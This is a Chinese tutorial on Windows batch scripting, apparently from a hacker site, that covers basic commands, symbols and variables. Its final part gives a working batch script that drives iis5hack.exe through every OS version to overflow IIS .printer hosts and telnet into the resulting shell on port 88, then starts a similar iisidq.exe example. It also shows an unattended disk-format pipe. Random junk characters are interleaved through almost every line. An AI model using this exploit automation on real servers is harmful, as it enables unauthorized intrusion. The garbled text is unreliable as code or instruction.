(新手入门)批处理

小引：
"k pVt,T.t4~3p eK0最近好多猜测弱口令的病毒在网上流行，比如前段时间闹得很厉害的Worm.Dvldr 蠕虫就是一个典型。这些病毒有个共同点就是利用批处理来进行ipc$连接，从而来猜测管理员的口令达到控制服务器的目的。病毒由几个文件和几个复杂的批处理组成。批处理算不上真正意义上的编程，但是它的一些思想和编程比较近似。通过在网上和一些初学的朋友交流，发现他们对于批处理很感兴趣，多多少少了解一些命令的用法，但缺乏比较系统的了解，所以特意写下这篇教程，好让感兴趣的朋友对批处理有个整体的认识，并能通过该教程举一反三，写出自己的批处理。★黑基空间★Uj0]#o"lC/|
该教程一共分为4大部分，第一部分是批处理的专用命令，第二部分是特殊的符号与批处理，第三部分是批处理与变量，第四部分是完整案例。因为教程比较长，所有在杂志上我们将分为两次连载，本期首先刊登一、二两部分，敬请读者注意。★黑基空间★)R0Eks];p"Q
★黑基空间★qm(v.A4O(y8L-O u
第一部分：批处理的专用命令
@@d\:jcu{'W0★黑基空间★h~Y'k|2dA;D%K
批处理文件是将一系列命令按一定的顺序集合为一个可执行的文本文件，其扩展名为BAT。这些命令统称批处理命令，下面我就来给大家介绍一下批处理的命令。★黑基空间★`7Y:f1Y&i,J
1、     REM
1K&I+h k)z0REM 是个注释命令一般是用来给程序加上注解的，该命令后的内容在程序执行的时候将不会被显示和执行。例：★黑基空间★+Wq4V:pk8r9J#I H
REM 你现在看到的就是注解，这一句将不会被执行。在以后的例子中解释的内容都REM 会放在REM后面。请大家注意。★黑基空间★/N(SoBbX;d\

1Z@Np2Nq7E02、     ECHO
9w0\"tBt6r/W*W0P0ECHO 是一个回显命令主要参数有OFF和 ON,一般用ECHO message来显示一个特定的消息 。例：★黑基空间★SH'zZ]0ve.q |t+m;B
Echo off★黑基空间★'UvI zas%_6Xg
Rem 以上代表关闭回显即不显示所执行的命令
8|EPKGH x
S3H0Echo 这个就是消息。★黑基空间★7W\(h'[/U
Rem 以上代表显示“这就是消息”这列字符
5X)P:@3?}1y0执行结果：★黑基空间★'^~K$W`h
C:\>ECHO.BAT
]0I4Cb c Q0这个就是消息。★黑基空间★s"C4i$Sz%u(Rl"tz
★黑基空间★.DN2?S3J-{+O Y
3、     GOTO
f#n dU:ny
F8w0GOTO 即为跳转的意思。在批处理中允许以“：XXX”来构建一个标号然后用GOTO ：标号直接来执行标号后的命令。例★黑基空间★_%H$D Ts'l
y[c
:LABEL★黑基空间★Z:b&f ED#i
REM 上面就是名为LABEL的标号。★黑基空间★^IQ'Z,Ov|
DIR C:\★黑基空间★4L
@APS+h'i
DIR D:\★黑基空间★(A ch]4ED!s4?
J
GOTO LABEL★黑基空间★/NySq6sL
REM 以上程序跳转标号LABEL处继续执行。
}
G!o]^#K"b v V0★黑基空间★j_\p;cu/G/^
4、CALL★黑基空间★f9BD;b4H:}0n
CALL 命令可以在批处理执行过程中调用另一个批处理，当另一个批处理执行完后再继续执行原来的批处理。例：
/g W9LMj[ q/r0r0批处理2.BAT内容如下：
T|T#YW0ECHO 这就是2的内容
)M ZK2Y-\S0批处理1.BAT内容如下：★黑基空间★`s]%A9h]]
ECHO 这是1的内容★黑基空间★ J qyjD
CALL 2.BAT
5n9\"X)u~(C$z!rf+\0ECHO 1和2的内容全部显示完成
%EX.yPxY"X/V%K I&x'q0执行结果如下：★黑基空间★t{
r+SJPH:[
      C:\>1.BAT
m;v)PEh#@0      这是1的内容
g
fG1i*\Q#J0  这就是2的内容★黑基空间★0{8m9o"ol(D
      1和2的内容全部显示完成
y0y$@;Q8E0★黑基空间★eeH1T&lS,Y!LBK$Z m
5、PAUSE★黑基空间★ZHn)O*a.UD+T U
PAUSE 停止系统命令的执行并显示下面的内容。例：★黑基空间★0RnjL1A*R3Ju"v
C:\> PAUSE
hI1dd"`zn h0请按任意键继续 . . .★黑基空间★Z y1}nG gY

L k1wI9m/}06、     IF
.`R3cM&{ O0IF 条件判断语句，语法格式如下：★黑基空间★9]7VoXq MYC8}
IF [NOT] ERRORLEVEL number command
Ed-m"kN0IF [NOT] string1==string2 command
q-C5[g2hY0IF [NOT] EXIST filename command
8[k'tX/z-J0o9i*eq0说明：★黑基空间★$i$i+w%rlJ
[NOT] 将返回的结果取反值即“如果没有”的意思。★黑基空间★(@"e6U~V9~
ERRORLEVEL 是命令执行完成后返回的退出值★黑基空间★/iyQ+KQ,zu `
Number 退出值的数字取值范围0~255。判断时值的排列顺序应该又大到小。返回的值大于或等于指定的值时条件成立。
XB^)Ib.E-Y0string1==string2 string1和string2都为字符的数据，英文字符的大小写将看做不同，这个条件中的等于号必须是2个（绝对相等），条件想等后即执行后面的 command
x_d%gX5GU_Q?0EXIST filename 为文件或目录存在的意思。★黑基空间★ wpJt$Y
IF ERRORLEVEL这条语句必须放在某一个命令后面。执行命令后由IF ERRORLEVEL来判断命令的返回值。★黑基空间★6CY&G0V9Q5b
例：★黑基空间★m#sE%p r/h"`ny
1、     IF [NOT] ERRORLEVEL number command
.xCTw0M-k0检测命令执行完后的返回值做出判断。★黑基空间★*k2^)y:|~!NJ(z
echo off★黑基空间★u4ke]4?%}qz
dir z:
`5}zWP {0rem 如果退出代码为1（不成功）就跳至标题1处执行★黑基空间★E4[X9c7U;s"g8o\`
IF ERRORLEVEL 1 goto 1★黑基空间★K9?hbsx*p}qj4yZ
rem 如果退出代码为0（成功）就跳至标题0处执行
%p5b9]~Z'rG0IF ERRORLEVEL 0 goto 0
6p A6|$wl!F7R0ta0:0
^!pE0P9Rn ^*Q@0echo 命令执行成功！★黑基空间★fm7Z!q*{`1@F\
Rem 程序执行完毕跳至标题exit处退出★黑基空间★0k%`/VM}Nj_\:aw|
goto exit
Z%MT1B-l'W!Z0:1
"H1yq%P%Hh0echo 命令执行失败！
0[!lR~ V"O0rW T t0Rem 程序执行完毕跳至标题exit处退出
(hzl!lG3}t0goto exit
2s Ua3H4bi8f'D0:exit
BK0k4g2L+i0Rem 这里是程序的出口
Ju L%u$] I{q02、     IF string1==string2 command
ZwTd.w3Q&r0检测当前变量的值做出判断★黑基空间★
R`)f$s,^+{ M|c9t
ECHO OFF
\x9h)ODC2g0IF %1==2 goto no
{8ta~m#B0Echo 变量相等！
"_%d5bI+Kk `1t,Aa(s1w0Goto exit★黑基空间★(kZ$K(KD_$I,o"aB
:no
'bS
bF0r9B0echo 变量不相等★黑基空间★!e#z*gay6M8n!p
goto exit
M!W0f6d%u9m0:exit★黑基空间★8Z!SO x$X6Xz
大家可以这样看效果 C:\>test.bat 数字
?:p'sLU~DK0
3{b(F#U4Y03、     IF [NOT] EXIST filename command
B.j"d$ch0@0发现特定的文件做出判断
Cd6X#s5^f0echo off
}+N Z.z)AR(`xW0IF not EXIST autoexec.bat goto 1★黑基空间★oY/Z:D0?
echo 文件存在成功！★黑基空间★VW:\.P?B(Z
goto exit
5UT-F(sF&{*KS(N$a0:1★黑基空间★1n`z.bl{Q2Qw~
echo 文件不存在失败！
6f*H HqhQ0goto exit
r7zf^.K-M(MH0:exit★黑基空间★!tGc"_ \HkZ
这个批处理大家可以放在c盘和d盘分别执行看看效果。★黑基空间★D"i"L*U4W
7、     FOR
y6y8KO8L/^^;T0FOR这个命令比较特殊是一个循环执行命令的命令，同时FOR的循环里面还可以套用FOR在进行循环。这篇我们介绍基本的用法就不做套用的循环了，后面再来讲解套用的循环。在批处理中FOR的命令如下：
8zhL1}2by]*?0FOR [%%c] IN (set) DO [command] [arguments]★黑基空间★O1]p%p3k`
在命令行中命令如下：
T%Z%g%E2}f5_5o0FOR [%c] IN (set) DO [command] [arguments]
!|j,b'GY5c/a;y Z{0常用参数：★黑基空间★r9ONBk]E
/L 该集表示以增量形式从开始到结束的一个数字序列。因此，(1,1,5) 将产生序列 1 2 3 4 5，(5,-1,1) 将产生序列 (5 4 3 2 1)。★黑基空间★m{iX0K5M
/D 如果集中包含通配符，则指定与目录名匹配，而不与文件名匹配。★黑基空间★_8w+Q^t r

p-af3BmK0/F 从指定的文件中读取数据作为变量
;d1fx6]"io.[/_N0eol=c       - 指一个行注释字符的结尾(就一个)
c1fV,]8o;u0skip=n       - 指在文件开始时忽略的行数。★黑基空间★,^`B'p.xM.o
delims=xxx     - 指分隔符集。这个替换了空格和跳格键的默认分隔符集。★黑基空间★,D!M{
XlfX
tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代的 for 本身。这会导致额外变量名称的分配。m-n格式为一个范围。通过 nth 符号指定 mth。如果符号字符串中的最后一个字符星号，那么额外的变量将在最后一个符号解析之后分配并接受行的保留文本。
~_e2bZq2GeX7oTB0usebackq     - 指定新语法已在下类情况中使用:在作为命令执行一个后引号的字符串并且一个单引号字符为文字字符串命令并允许在 filenameset中使用双引号扩起文件名称。
sw}K&Xb9b(_0下面来看一个例子：
4|!J%j]0LgH8K#T0FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do @echo %i %j %k★黑基空间★+YU+f._&eN uE^9r
会分析 myfile.txt 中的每一行，忽略以分号打头的那些行，将每行中的第二个和第三个符号传递给 for 程序体；用逗号和/或空格定界符号。请注意，这个 for 程序体的语句引用 %i 来取得第二个符号，引用 %j 来取得第三个符号，引用 %k来取得第三个符号后的所有剩余符号。对于带有空格的文件名，您需要用双引号将文件名括起来。为了用这种方式来使用双引号，您还需要使用 usebackq 选项，否则，双引号会被理解成是用作定义某个要分析的字符串的。★黑基空间★b8qL_ M.^AzHnn\NQ
%i 专门在 for 语句中得到说明，%j 和 %k 是通过tokens= 选项专门得到说明的。您可以通过 tokens= 一行指定最多 26 个符号，只要不试图说明一个高于字母 'z' 或'Z' 的变量。请记住，FOR 变量名分大小写，是通用的；而且，同时不能有 52 个以上都在使用中。
4R5?b)a%n0您还可以在相邻字符串上使用 FOR /F 分析逻辑；方法是，用单引号将括号之间的 filenameset 括起来。这样，该字符串会被当作一个文件中的一个单一输入行。最后，您可以用 FOR /F 命令来分析命令的输出。方法是，将括号之间的 filenameset 变成一个反括字符串。该字符串会被当作命令行，传递到一个子 CMD.EXE，其输出会被抓进内存，并被当作文件分析。因此，以下例子:
V0P6]x.P Z#_0FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i★黑基空间★2r}.k'N2g8T
会枚举当前环境中的环境变量名称。
m)b&RJC3I0Y0以下列举一个简单的例子，他将说明参数/L和没有参数的区别：
V2tVw^Wn!t;p;sF0删除文件1.TXT 2.TXT 3.TXT 4.TXT 5.TXT★黑基空间★R}6X4`~0f7v
例：
D]yQ q$H3X0ECHO OFF★黑基空间★7r4CX+K
Uy
FOR /L %%F IN (1,1,5) DO DEL %%F.TXT
7`_n U'vp-r-y0或
0O;KuxkI/g#md0FOR %%F IN (1,2,3,4,5) DO DEL %%F.TXT★黑基空间★`bwm;W'cxj
以上2条命令执行的结果都是一样的如下：
-At4B1e$u lv-K0C:\>DEL 1.TXT★黑基空间★.|R)f%H%dv)l
C:\>DEL 2.TXT
LYh7j/`2Dt VU-m8[)@ H0C:\>DEL 3.TXT
8jf|;II[X3`0C:\>DEL 4.TXT
@pJ @$[J?5_0C:\>DEL 5.TXT
!kD R9nLTy;U1_b0★黑基空间★uj`#@'p n;G
8、     SETLOCAL★黑基空间★,v2T#f BS A9R
开始批处理文件中环境改动的本地化操作。在执行 SETLOCAL 之后
;NS2{:EZ0所做的环境改动只限于批处理文件。要还原原先的设置，必须执
DP'p/gDk"Dj2i3e&vB0行 ENDLOCAL。 达到批处理文件结尾时，对于该批处理文件的每个★黑基空间★/w/~ {gaFq
尚未执行的 SETLOCAL 命令，都会有一个隐含的 ENDLOCAL 被★黑基空间★QJ(A7~s
执行。例：
-w5A.[lA0@ECHO OFF★黑基空间★c'[Wo
Sk [*c)rm
SET PATH       /*察看环境变量PATH
~d,he-k y%E^z0PAUSE
l:zf5G[+Bh0SETLOCAL★黑基空间★N;V)pvw5z+pC
SET PATH=E:\TOOLS   /*重新设置环境变量PATH
'D#Y:j!{icwJ1j#J^0SET PATH★黑基空间★q%P.Mp}
z7un#DJ
PAUSE★黑基空间★#|Lx|0R+o_/fq
ENDLOCAL
9@c8S\A0SET PATH
U(?'NJ"s0从上例我们可以看到环境变量PATH第1次被显示得时候是系统默认路径。被设置成了E:\TOOLS后显示为E:\TOOLS但当ENDLOCAL后我们可以看到他又被还原成了系统的默认路径。但这个设置只在该批处理运行的时候有作用。当批处理运行完成后环境变量PATH将会还原。★黑基空间★:oNT2a`OY0aQ g

t"Y(@y%P ]09、     SHIFT
(F3Ty'q/j0SHIFT命令可以让在命令上的的命令使用超过10个（%0~%9）以上的可替代参数例：★黑基空间★R4_&x.fgL
ECHO OFF
'oK-M!g;v8W [q0ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9★黑基空间★j!G.x|l`
SHIFT★黑基空间★s-e4u@$\7R,dL kx
ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9
zHDj7G0SHIFT
cN/W\*cR#C0ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9
2Xw? D/l.AE"l0执行结果如下：★黑基空间★#O4AV#mx1N
C::\>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11
7Q r |F"K#W01 2 3 4 5 6 7 8 9★黑基空间★ @N ~ Bp9V%P
2 3 4 5 6 7 8 9 10
vktc#J03 4 5 6 7 8 9 10 11
*j-G0e-Z|4T&A0以上就是基于WIN2000下的9个批处理命令。
wcI2C3x0★黑基空间★!K-hU7~HT}
第二部分：特殊的符号与批处理★黑基空间★,]JaKt Z
★黑基空间★S&N'mZ2fG'o
在命令行下有些符号是不允许使用的但有些符号却有着特殊的意义。★黑基空间★x P6H-Wh$Ng
1、     符号(@)★黑基空间★%y;t(er}/}.U
@在批处理中的意思是关闭当前行的回显。我们从上面知道用命令echo off可以关掉整个批处理的命令回显但却不能不显示echo off这个命令。现在我们在这个命令前加上@这样echo off这一命令就被@关闭了回显从而达到所有命令均不回显得要求
q4s'v#V _$T02、     符号(>)
)d si9t,?:{
wU0>的意思是传递并覆盖。他所起的作用是将运行后的回显结果传递到后面的范围（后面可是文件也可是默认的系统控制台）例：
u/AG8UQ1qS-{/Cz%J0文件1.txt的文件内容为：
Ev)K6c;xE.M;I|!t J01+1
\0U_'L [HUx0使用命令c:\>dir *.txt >1.txt
^^:uhP0这时候1.txt的内容如下
3QL+K0ck)Y pq0驱动器 C 中的卷没有标签。★黑基空间★E%~/G(@G'D IL1kU
卷的序列号是 301A-1508★黑基空间★ r"m)i.F#u
C:\ 的目录
^m'V
LY B02003-03-11 14:04           1,005 FRUNLOG.TXT★黑基空间★k1PuEwV
2003-04-04 16:38       18,598,494 log.txt★黑基空间★)V,rN
nI7yG?!\q(r
2003-04-04 17:02             5 1.txt★黑基空间★)w7II-dP!f2R/Q
2003-03-12 11:43             0 aierrorlog.txt
QM'}lSaW02003-03-30 00:35           30,571 202.108.txt★黑基空间★4abQJ["EL
          5 个文件   18,630,070 字节★黑基空间★ xx5z8A%IB M6L2}"l
          0 个目录 1,191,542,784 可用字节★黑基空间★ q,S*c#zK[`
>将命令执行的结果覆盖了原始的文件内容。
,~*p5XZ+Wku0在传递给控制台的时候程序将不会有任何回显（注意：这里的回显跟echo off关掉的回显不是同一概念。Echo off关掉的是输入命令的回显，这里的回显是程序执行中或后的回显）例：★黑基空间★-ly4k:T o|J
C:\>dir *.txt >nul★黑基空间★z#P_p}7mM;r-E
程序将没有任何显示也不会产生任何痕迹。★黑基空间★c3je A2[
3、     符号(>>)
nq-v
NcNx\@-P w0符号>>的作用与符号>相似，但他们的区别在于>>是传递并在文件末尾追加>>也可将回显传递给控制台（用法同上）例：
*i4F2B%t)k?.f!Mn4d0文件1.txt内同为：
E_])A#_01+1★黑基空间★3u|4}{:D"cap
使用命令c:\>dir *.txt >>1.txt★黑基空间★AM7C
t of0ef
这时候1.txt的内容如下
Y%MQ(T/Y01+1
S!ROZV0`0驱动器 C 中的卷没有标签。★黑基空间★8{5e,AtUw3p
卷的序列号是 301A-1508
tR1Y%~d P/VG'U0C:\ 的目录
s@hH\"|3k02003-03-11 14:04           1,005 FRUNLOG.TXT★黑基空间★z9k)U!G}UI|
2003-04-04 16:38       18,598,494 log.txt★黑基空间★Z&J _0yS]oc(Sy
2003-04-04 17:02             5 1.txt★黑基空间★ U|th0m$jC
2003-03-12 11:43             0 aierrorlog.txt
A%b?k0i2W jL[L$Z02003-03-30 00:35           30,571 202.108.txt

[3i9Cf uj_0          5 个文件   18,630,070 字节★黑基空间★%CL/p k[3s9{(Vsb6Of
          0 个目录 1,191,542,784 可用字节★黑基空间★,Yi,L!Pq"_z
>>将命令执行的结果覆加在了原始的文件内容后面。★黑基空间★R%|@kA/??$b
4、     符号(|)
p#|-\Xfu)E0|是一个管道传输命令意思是将上一命令执行的结果传递给下一命令去处理。例：
8C5z/V.n3u&n5C!d0C:\>dir c:\|find "1508"★黑基空间★n1Z:Nw]8c o7_,L
卷的序列号是 301A-1508★黑基空间★)ZxP Nq|
以上命令的意思为查找c:\的所有并发现1508字符串。Find的用法请用 find /?自行查看
3n8w*v,ceuG0在不使用format的自动格式化参数的时候我是这样来自动格式化盘片的
gB g@O;A+Ueyn0echo y|fornat a: /s /q /v:system
*o5FP,TiW7i5BT ^0用过format命令的人都知道format有一个交互对化过程，要使用者输入y来确定当前的命令是否被执行。在这个命令前加上echo y并用管道传输符|将echo执行的结果y传递给format从而达到手工输入y的目的（这条命令有危害性，测试的时候请谨慎）★黑基空间★,S:I1u$B0w
io
5、     符号(^)★黑基空间★Jz
R.iJ3M'l
^ 是对特殊符号 > 、<、 &、的前导字符。在命令中他将以上的3个符号的特殊动能去掉仅仅只吧他们当成符号而不使用他们的特殊意义。例：★黑基空间★%?$i*o9x2E0u#X
c-Q^(C
c:\>echo test ^> 1.txt
bi,~eI$o g @:T#r0test > 1.txt★黑基空间★(~{)s!n4okaRw
从上面可以看出并没有把test写入文件1.txt而是将test >1.txt 当字符串显示了出来。这个符号在远程构建批处理的时候很有效果。
9NO `*~-w*n3FY`06、     符号(&)★黑基空间★^$Z#r3mV
&符号允许在一行中使用2个以上不同的命令，当第一个命令执行失败将不影响第2个命令的执行。例：
U
^ u1}Q5u;kD0c:\> dir z:\ &dir y:\ &dir c:\
DHR7y;zh-y B;Y0以上的命令将会连续显示z: y: c:盘内的内容不理会该盘符是否存在。★黑基空间★
Q!Yg3gE/Pb+FQ
P%y
7、     符号(&&)★黑基空间★,N F3m6la&~m
&&符号也是允许在一行中使用2个以上不同的命令，当第一个命令执行失败后后续的命令将不会再被执行。例：★黑基空间★b }Z(y#s1q*w
c:\> dir z:\ &&dir y:\ &&dir c:\★黑基空间★DBQ8_1cr:dx'?
以上的命令将会提示检查是否存在z:盘如果存在则执行，如果不存在则停止执行所有的后续命令
O|R^4oP08、     符号(" ")
y*]:v;~Q+e0" "符号允许在字符串中包含空格。进入一个特殊的目录可以用如下方法例:★黑基空间★)M6K B0n{ C
c:\>cd “Program Files”
H$sl4_L3AdI+E0c:\>cd progra~1
'Q#\kG\-a2A0c:\>cd pro*
,B}%e%@AL J0以上方法都可以进入Program Files目录★黑基空间★KFW1y&PP9nL'G
9、     符号（,）★黑基空间★;\)r|~wOy]w
,符号相当于空格。在某些特殊的情况下可以用,来代替空格使用。例：
Ud?9j x0c:\>dir,c:\
5@xs(dq010、     符号(;)
\+Z4LzZ^8jM0;符号当命令相同的时候可以将不同的目标用;隔离开来但执行效果不变。如执行过程中发生错误则只返回错误报告但程序还是会继续执行。例：★黑基空间★.V)VbIy,r:DF#fT9FB
DIR C:\;D:\;E:\F:\
jl'c1_"Z6?0以上的命令相当于★黑基空间★GDtmV
DIR C:\
.eN s8i/Xo!F0DIR D:\★黑基空间★1Rawm"A }-A
DIR E:\
EzPm5M;Ia0DIR F:\★黑基空间★1JKb{dVtp,j@
当然还有些特殊的符号但他们的使用范围很小我就不再这里一一的说明了。★黑基空间★z6qO)Ht

-T'b.ML'd^w0第三部分：批处理与变量
.Ha$qX9}(Pi#rS*u0★黑基空间★-d,Q]!~w-_g
在批处理中适当的引用变量将会使你所编制的程序应用面更广。批处理每次能处理的变量从%0~%9共10个。其中%0默认给批处理的文件名使用。除非在使用SHIFT命令后%0才能被%1所替代。引用shift命令的例子如果把%1前面多加上一个%0那么结果如下：★黑基空间★ u? lZ U,bK
C::\>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11
-O9DXH5YU%@q
M+P0SHIFT.BAT 1 2 3 4 5 6 7 8 9
w$dP,l(^Oy"UV!KW01 2 3 4 5 6 7 8 9 10★黑基空间★wi|0x[We)g]"Ce
2 3 4 5 6 7 8 9 10 11★黑基空间★5K Z8W!fq6P&J,Ra
系统是如何区分每个变量的呢，系统区分变量的规则为字符串中间的空格，即只要发现空格就把空格前面的字符当作一个变量而空格后面的字符则作为另一个变量。如果你的变量是一个当中包含空格的长目录名这时候你需要用上一节特殊符号8中所用的引号将他圈起来。例：
wKi9r)~0批处理内容为：
(u*S0I{f)of2i2x0ECHO %1
s(UzI`-J0ECHO %2★黑基空间★*|:_&M)e VR|P
ECHO %3
BT _c/Y3R7sZ0输入命令：★黑基空间★b4Fr;u5a$`0i
C:\>TEST “Program Files” Program Files★黑基空间★d~pt`"n+Z
Program Files★黑基空间★Is:~ IB;p
Program★黑基空间★6HZ2bn[r
Files
(JU F pC0在一个复杂的批处理中又可能同时使用的变量会超过10个这时候会和系统的规则想冲突那么这个问题怎么解决呢？在系统中还有一种变量称之为环境变量（使用SET命令可以查看当前系统的环境变量）如当前系统目录是%windir%或%SystemRoot%等。当同时使用的参数超过10个的时候，我们可以把某些在后面的程序中还要调用的变量保存为环境变量。具体用法如 SET A=%1 这样我们就命名了一个新的环境变量A 在调用变量A的时候要%A%这样调用，环境变量不受SHIFT命令影响。如果要改变一个环境变量需要重新对其设置才能改变。当然也可以进行变量与变量之间的传递来达到目的。下面我们来看一个例子，批处理如下：★黑基空间★5S T*H(CD
ECHO OFF
Ul[]!Mm b0SET PASS=%1
x
Su }5?+S]r"T.lL0SHIFT★黑基空间★-{Ls:\-Q:]:tEr"d
SET PASS1=%1★黑基空间★)o,_w_Pj-\
SHIFT
3DHc"la1u:\E0ECHO %PASS% %PASS1% %1 %2 %3 %4 %5 %6 %7 %8 %9

z(L.] ][KP0SHIFT
u6G Kqo:Y0ECHO %PASS% %PASS1% %9
)c8fb!|O:A-X0SET PASS=%PASS1%       变量的传递★黑基空间★S M)cQZ(~3A/m5]
SET PASS1=%9
w7L&l7lpv3L
t(m!e0SHIFT★黑基空间★;Z%d0A
ma_I*[
ECHO %PASS% %PASS1% %9
.B%Lr!S!Qw!a%s9^/b0使用命令：C:\>TEST A B 3 4 5 6 7 8 9 10 K L★黑基空间★)oA#? D W
MRM sE
A B 3 4 5 6 7 8 9 10 K 注意：这一行显示了11个变量
2{r!^9jo5w0A B L           在使用了3次SHIFT之后%9变成了L
j$t(`uI Pn0B L             变量的传递后的结果★黑基空间★e.\;[G5k Ux-@K|

(F&j;q L+{8H)h~0
)B8De
zd
{cw8t9r0第四部分：完整案例
0i6d Q%SSSKtE0
DFH2p#@Ag'iiEf0以上就是批处理的一些用法。现在我们把这些用法结合起来详细的分析一下目前网上发布的一些批处理，看看他们是怎么运作的。这里我将列举三个例子来详细分析，为了保持程序的完整我的注释会加在/*后面。
r:N1?s,yz:h^s#u.P0例一
h#Ny&S$W+D5ZS0这个例子是利用iis5hack.exe对有.printer漏洞的主机进行溢出的批处理。用到的程序有iis5hack.exe和系统自带的telnet.exe。iis5hack的命令格式为：★黑基空间★.}OG|~zt_
iis5hack <目标ip> <目标端口> <目标版本> <溢出连接端口>目标版本为0-9这10个数字分别对应不同语言版本和sp的系统版本，我们编制的批处理使用的命令格式为 <iis.bat 目标ip （开始版本号）>开始版本号可有可无。程序如下。★黑基空间★ ]` g2]:g7n?bY e
@echo off                   /*关闭命令回显
:TN*a/[upim%c0if "%1%"=="" goto help           /*判断%1是否为空，%1为目标ip★黑基空间★lz8e F[
if "%2%"=="1" goto 1             /*判断%2是否为1，为1则跳转标志1
&L[saS4T#wa0if "%2%"=="2" goto 2             /*%2为开始版本号，如果没有设置则
4xSZ`)a[ fX?/[G0if "%2%"=="3" goto 3             /*如果存在则从匹配的地方开始执行
0Ut:[
p/W5K&I&E$V5R0if "%2%"=="4" goto 4★黑基空间★4n!qjt7xfev \
if "%2%"=="5" goto 5★黑基空间★9gS*M5{kH$Z"R
if "%2%"=="6" goto 6
'?5Jkx-EN0if "%2%"=="7" goto 7
7q*u$manm6X0if "%2%"=="8" goto 8
u9Bv J/y3{0if not EXIST iis5hack.exe goto file /*没有发现iis5hack.exe就执行标志file段内容
9{f,s'K Ke0g(`0ping %1 -n 1 | find "Received = 1" /*ping目标1次，从结果中发现Received = 1
eEK"w"Y @/N0if errorlevel 1 goto error       /*如果返回代码为1则执行error段(代码1为没有发现 0为发现并成功执行)
K&I f*dzXh
Cev0iis5hack %1 80 9 88 | find "good" /*开始溢出目标端口80 系统代码9 溢出后连接端口88 在执行结果中发现字符串”good”(溢出成功后才会有字符串good)★黑基空间★"K{!e NV
if not errorlevel 1 goto telnet     /*如果没有错误代码1（溢出成功）就执行telnet段的内容。★黑基空间★#vG8P|my
echo 操作系统类型 9 失败!   /否则显示这一句
0e:p{Y[/f4TS#D%o0:8                   /*以下代码内容参照上面★黑基空间★/N ZPLne
iis5hack %1 80 8 88 | find "good"
Pp/lJ?,W0if not errorlevel 1 goto telnet
#a6?Y%i^ j(lD-|0echo 操作系统类型 8 失败!★黑基空间★~YK~ g
:7
_8eVL*Q~nuR0iis5hack %1 80 7 88 | find "good"
"vApUbn0if not errorlevel 1 goto telnet
9p$M0` }&`/N]"S0echo 操作系统类型 7 失败!
4k7imZUs ?0:6★黑基空间★)QjK1Cp|/w
iis5hack %1 80 6 88 | find "good"★黑基空间★apG.WP$`9B
if not errorlevel 1 goto telnet★黑基空间★3?ehea}QR
echo 操作系统类型 6 失败!★黑基空间★qR d:p1Z,["hz
:5★黑基空间★,B5S/Q%LIuu
iis5hack %1 80 5 88 | find "good"
2V5e#Q7k-c6\h7S0if not errorlevel 1 goto telnet
y g z
~u CD$R@)I0echo 操作系统类型 5 失败!★黑基空间★d,d A T i
:4★黑基空间★"pM8?H&}3zkYx
iis5hack %1 80 4 88 | find "good"★黑基空间★Q/I.](dKu
if not errorlevel 1 goto telnet★黑基空间★J5\\*K2ou{
echo 操作系统类型 4 失败!★黑基空间★$]o[*L8B^
:3★黑基空间★F A7z J.x
e`*[
iis5hack %1 80 3 88 | find "good"★黑基空间★$W*c!f;s(L*Z0B
if not errorlevel 1 goto telnet★黑基空间★_0CD*g:a!?L
echo 操作系统类型 3 失败!
d+}+`&b#O~{(v(nJ0:2★黑基空间★E4m#]c7JH7P
iis5hack %1 80 2 88 | find "good"★黑基空间★D7|!d|
_R
if not errorlevel 1 goto telnet
}L8\s,kur0echo 操作系统类型 2 失败!★黑基空间★6x {i {v"L
:1
j:NW:cZ H
X0iis5hack %1 80 1 88 | find "good"
j7W$i5M_)T n9X[;O0if not errorlevel 1 goto telnet★黑基空间★ t_%mWV;w H&vH
echo 操作系统类型 1 失败!★黑基空间★)^Yp? UWXr
:0
|W-Y@d0iis5hack %1 80 0 88 | find "good"★黑基空间★u(Y7p9fcO\
if not errorlevel 1 goto telnet
0s7eN2AAGZ)mqF#s`0echo 操作系统类型 0 失败!
JxT%I#T`yt9ly
|#@0goto error★黑基空间★m Uz
XS*U}&GI5Y8b
:telnet★黑基空间★(H4Tu7N`4B6|C
telnet %1 88               /*开始连接目标ip的88端口
7D;@,V9_;p/e0goto exit                 /*连接中断后跳转exit段★黑基空间★\{uScpY
:error                 /*error段显示错误后的帮助信息
M#W8pD9KD.^0echo 可能网络不能连接或者对方以修补该漏洞!请按照下面的格式手工尝试一次!
o5|!D0C%p&Ah8I0echo iis5hack [目标IP] [WEB端口] [系统类型] [开放端口]
1l"{m'S A-YtF1F0ECHO 中文:         0★黑基空间★UF5L;z.e7jG
V
ECHO 中文+sp1:     1★黑基空间★#R/n&x@8O!o#D;{
ECHO 英文:         2
7_0H,~|XVZhX0ECHO 英文+sp1:     3★黑基空间★U!M-hA-e
ECHO 日语:         4

o.lHf E'I?3~wI0ECHO 日语+sp1:     5★黑基空间★!F7\ lWi9o0o
ECHO 韩文:         6★黑基空间★9H6ez?F;~ @
ECHO 韩文+sp1:     7★黑基空间★)Pnm1s/R
ECHO 墨西哥语:     8★黑基空间★%DAEU|2I
ECHO 墨西哥语+sp1:   9★黑基空间★ w2rcv*^p"a"h)X-`
goto exit       /*跳转exit段★黑基空间★
^3lu.cK.d1op
:file           /*file段显示文件没有发现的信息★黑基空间★g"e!svPp
L
echo 文件iis5hack.exe没有发现!程序终止运行!
'I fd3J;LH0goto exit       /*跳转exit段★黑基空间★-vE |a:V/at
:help         /*help段显示本批处理的使用格式帮助★黑基空间★N6L&p:Q}#L*N)?
echo 本程序用法如下:
l#x-m6U-W&c\0echo iis [目标ip]★黑基空间★)Wy^:A:v;j%@bu @c
echo iis [目标ip] [开始的号码9-0]
3V"l/hR6q0:exit           /*exit段为程序出口
'tU1pb%F0这个批处理基本没有什么循环只是一路走下来。所以代码比较长难度不大！★黑基空间★5y:YVH4w1I
例二★黑基空间★`^%V*I ~p3o*W9H
这个例子是用iisidq.exe对有idq漏洞的机器进行溢出的批处理。使用的程序有iisidq.exe和系统自带的程序telnet.exe。iisidq.exe的用法如下：★黑基空间★]8Kmk#O7Q8Lmb
运行参数: 操作系统类型 目的地址 web端口 1 溢出监听端口 <输入命令1>★黑基空间★+ia.FR+l:hW
  其中,如果输入命令参数没有输入,那么,默认为:"cmd.exe"。★黑基空间★A L]a+cG(I:w9h4]w
["J
